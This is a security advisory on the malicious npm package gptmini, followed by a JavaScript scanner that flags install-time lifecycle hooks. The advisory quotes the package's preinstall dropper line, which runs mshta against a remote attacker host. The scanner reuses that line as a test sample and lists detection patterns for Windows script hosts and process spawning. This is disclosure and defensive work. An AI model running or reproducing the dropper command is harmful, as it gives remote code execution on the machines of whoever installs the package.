MAL-2026-6537
Malicious code in gptmini (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cb05abb3d36b111df4aa8fe044cbf05a431a0778e90d022e1621494c1506a171)

On `npm install`, the package's preinstall lifecycle script (preinstall.js, declared via scripts.preinstall "node preinstall.js") shells out with `exec('cmd /c "mshta http://fixars.top"')`. This causes Windows to fetch and execute an HTML Application from the remote host fixars.top over plain HTTP at install time with no user interaction, yielding remote code execution on the installer's machine. The package presents itself as a Node.js wrapper for a GPT/OpenAI-style SDK (name `gptmini`, baseUrl https://api.openllm.ai/v1), with empty author metadata — an AI-SDK-shaped lure paired with an install-time dropper to an attacker-controlled domain unrelated to any documented publisher.
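The install-time pattern described above can be looked for statically, before anything is installed. The following is an added example, not part of the advisory or of any scanner named on this page: it audits a parsed `package.json` and the unpacked script files for install lifecycle hooks that spawn processes, call Windows script hosts, or reference plain-HTTP URLs. The function names, the indicator list (heuristic and not exhaustive) and the sample inputs are assumptions constructed for illustration.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic indicators (assumed for this example, not exhaustive).
const INDICATORS = [
  { id: "child-process", re: /\b(?:exec|execSync|spawn|spawnSync|execFile)\s*\(/ },
  { id: "windows-lolbin", re: /\b(?:mshta|rundll32|regsvr32|certutil|bitsadmin|powershell)\b/i },
  { id: "plain-http-url", re: /\bhttp:\/\/[^\s"'`)]+/i },
];

// Resolve a `node <file>` hook command to the script file it launches.
function hookTargets(command) {
  const m = /^\s*node\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/.exec(command);
  return m ? [m[1]] : [];
}

// manifest: parsed package.json; files: { relativePath: sourceText } from the unpacked tarball.
function auditInstallHooks(manifest, files) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = manifest.scripts && manifest.scripts[hook];
    if (!command) continue;
    // Scan the hook command itself and any script file it launches.
    const sources = [[`scripts.${hook}`, command]];
    for (const file of hookTargets(command)) {
      if (files[file] !== undefined) sources.push([file, files[file]]);
      else findings.push({ hook, where: file, id: "missing-hook-script" });
    }
    for (const [where, text] of sources) {
      for (const { id, re } of INDICATORS) {
        const m = re.exec(text);
        if (m) findings.push({ hook, where, id, match: m[0] });
      }
    }
  }
  return findings;
}

// Constructed sample reproducing the shape described in the advisory (never executed).
const sampleManifest = { name: "gptmini", scripts: { preinstall: "node preinstall.js" } };
const sampleFiles = {
  "preinstall.js": "const { exec } = require('child_process');\nexec('cmd /c \"mshta http://fixars.top\"');\n",
};
// Constructed benign manifest: scripts exist, but none run at install time.
const benignManifest = { name: "example-lib", scripts: { test: "node test.js", build: "tsc" } };

console.log(auditInstallHooks(sampleManifest, sampleFiles));
```

Installing with `npm install --ignore-scripts` prevents lifecycle scripts such as this preinstall hook from running at all.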
Affected packages
No fixed version published yet for gptmini (npm). Pin to a known-safe version or switch to an alternative.